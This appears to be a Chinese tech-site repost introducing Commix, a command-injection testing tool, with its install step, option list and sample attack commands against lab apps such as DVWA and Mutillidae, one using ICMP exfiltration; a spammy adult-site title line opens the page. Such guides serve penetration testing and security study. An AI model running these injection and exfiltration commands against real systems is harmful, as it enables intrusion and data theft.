自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

系統(tǒng)命令注入漏洞自動化測試工具——Commix

安全 數(shù)據(jù)安全 自動化
Commix是一個(gè)適用于web開發(fā)者、滲透測試人員及安全研究者的自動化測試工具,可以幫助他們更高效的發(fā)現(xiàn)web應(yīng)用中的命令注入攻擊相關(guān)漏洞。Commix由Python編寫。

Commix是一個(gè)適用于web開發(fā)者、滲透測試人員及安全研究者的自動化測試工具,可以幫助他們更高效的發(fā)現(xiàn)web應(yīng)用中的命令注入攻擊相關(guān)漏洞。Commix由Python編寫。

 系統(tǒng)命令注入漏洞自動化測試工具 – Commix

環(huán)境要求
Python 2.6.x或2.7.x

安裝
下載git clone https://github.com/stasinopoulos/commix.git commix

使用

基本使用

Usage: python commix.py [options]

選項(xiàng)

-h, --help Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

目標(biāo)

--url=URL           Target URL.
--url-reload        Reload target URL after command execution.

請求

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

注入

--data=DATA         POST data to inject (use 'INJECT_HERE' tag).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').

測試示例

測試漏洞web應(yīng)用Damn 

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

使用注入攻擊Payload參數(shù)測試php-Charts 1.0

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="//" --suffix="'"

使用特殊的頭和HTTP代理測試OWASP Mutillidae

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

使用ICMP滲漏(exfiltration)技術(shù)測試Persistence

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

責(zé)任編輯:王雪燕 來源: FreeBuf黑客與極客
相關(guān)推薦

2012-12-24 22:54:31

2014-11-12 09:24:00

2011-05-30 17:50:23

分布式測試

2011-05-31 18:17:07

分布式測試

2022-07-04 09:00:36

Playwright自動化測試工具

2014-12-04 15:01:13

2022-08-08 07:35:37

云測試工具云存儲云計(jì)算

2009-07-06 10:08:03

Flex自動化

2011-11-18 09:11:21

Web

2010-08-10 14:34:37

QTPFlex

2011-06-08 17:15:46

QTP腳本

2010-08-10 14:25:42

SilkTestFlex

2022-06-02 09:00:00

人工智能工具自動化測試

2021-12-17 10:01:52

人工智能測試工具

2010-08-10 14:18:15

RationalFunFlex

2022-12-04 23:52:11

iOS自動化工具

2019-01-23 09:00:00

2020-08-07 08:10:25

開源技術(shù) 工具

2012-09-17 13:21:22

iOSAndroid自動化測試工具

2016-11-11 14:34:46

開源開源工具
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號